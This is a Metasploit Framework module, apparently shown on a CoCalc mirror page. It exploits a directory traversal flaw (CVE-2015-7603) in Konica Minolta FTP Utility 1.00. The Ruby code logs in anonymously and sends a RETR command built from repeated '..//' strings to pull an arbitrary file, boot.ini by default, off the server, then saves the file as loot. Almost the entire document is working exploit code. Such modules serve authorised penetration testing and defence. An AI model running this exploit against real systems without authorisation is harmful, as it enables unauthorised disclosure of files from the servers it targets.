Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/scanner/ftp/konica_ftp_traversal.rb
19851 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::Remote::Ftp

8
  include Msf::Auxiliary::Report

9
  include Msf::Auxiliary::Scanner

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'Konica Minolta FTP Utility 1.00 Directory Traversal Information Disclosure',

16
        'Description' => %q{

17
          This module exploits a directory traversal vulnerability found in Konica Minolta FTP Utility 1.0.

18
          This vulnerability allows an attacker to download arbitrary files from the server by crafting

19
          a RETR command that includes file system traversal strings such as '..//'

20
        },

21
        'Platform' => 'win',

22
        'Author' => [

23
          'Jay Turla', # @shipcod3, msf

24
          'James Fitts', # msf

25
          'Brad Wolfe <brad.wolfe[at]gmail.com>', # msf

26
          'shinnai' # initial discovery

27
        ],

28
        'License' => MSF_LICENSE,

29
        'References' => [

30
          [ 'EDB', '38260'],

31
          [ 'CVE', '2015-7603'],

32
          [ 'URL', 'https://shinnai.altervista.org/exploits/SH-0024-20150922.html']

33
        ],

34
        'DisclosureDate' => '2015-09-22',

35
        'Notes' => {

36
          'Reliability' => UNKNOWN_RELIABILITY,

37
          'Stability' => UNKNOWN_STABILITY,

38
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

39
        }

40
      )

41
    )

42


43
    register_options(

44
      [

45
        OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),

46
        OptString.new('PATH', [ true, "Path to the file to disclose, relative to the root dir.", 'boot.ini'])

47
      ]

48
    )

49
  end

50


51
  def check_host(ip)

52
    begin

53
      connect

54
      if /FTP Utility FTP server \(Version 1\.00\)/i === banner

55
        return Exploit::CheckCode::Appears

56
      end

57
    ensure

58
      disconnect

59
    end

60


61
    Exploit::CheckCode::Safe

62
  end

63


64
  def run_host(target_host)

65
    begin

66
      # Login anonymously and open the socket that we'll use for data retrieval.

67
      connect_login

68
      sock = data_connect

69
      if sock.nil?

70
        error_msg = __FILE__ << '::' << __method__.to_s << ':' << 'data_connect failed; possible invalid response'

71
        print_status(error_msg)

72
        elog(error_msg)

73
      else

74
        file_path = datastore['PATH']

75
        file = ::File.basename(file_path)

76


77
        # make RETR request and store server response message...

78
        retr_cmd = ("..//" * datastore['DEPTH']) + "#{file_path}"

79
        res = send_cmd(["RETR", retr_cmd])

80


81
        # read the file data from the socket that we opened

82
        # dont assume theres still a sock to read from. Per #7582

83
        if sock.nil?

84
          error_msg = __FILE__ << '::' << __method__.to_s << ':' << 'data_connect failed; possible invalid response'

85
          print_status(error_msg)

86
          elog(error_msg)

87
          return

88
        else

89
          # read the file data from the socket that we opened

90
          response_data = sock.read(1024)

91
        end

92


93
        unless response_data

94
          print_error("#{file_path} not found")

95
          return

96
        end

97


98
        if response_data.length == 0 or !(res =~ /^150/)

99
          print_status("File (#{file_path})from #{peer} is empty...")

100
          return

101
        end

102


103
        # store file data to loot

104
        loot_file = store_loot("konica.ftp.data", "text", rhost, response_data, file, file_path)

105
        vprint_status("Data returned:\n")

106
        vprint_line(response_data)

107
        print_good("Stored #{file_path} to #{loot_file}")

108
      end

109
    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e

110
      vprint_error(e.message)

111
      elog(e)

112
    rescue ::Timeout::Error, ::Errno::EPIPE => e

113
      vprint_error(e.message)

114
      elog(e)

115
    ensure

116
      data_disconnect

117
      disconnect

118
    end

119
  end

120
end

121


122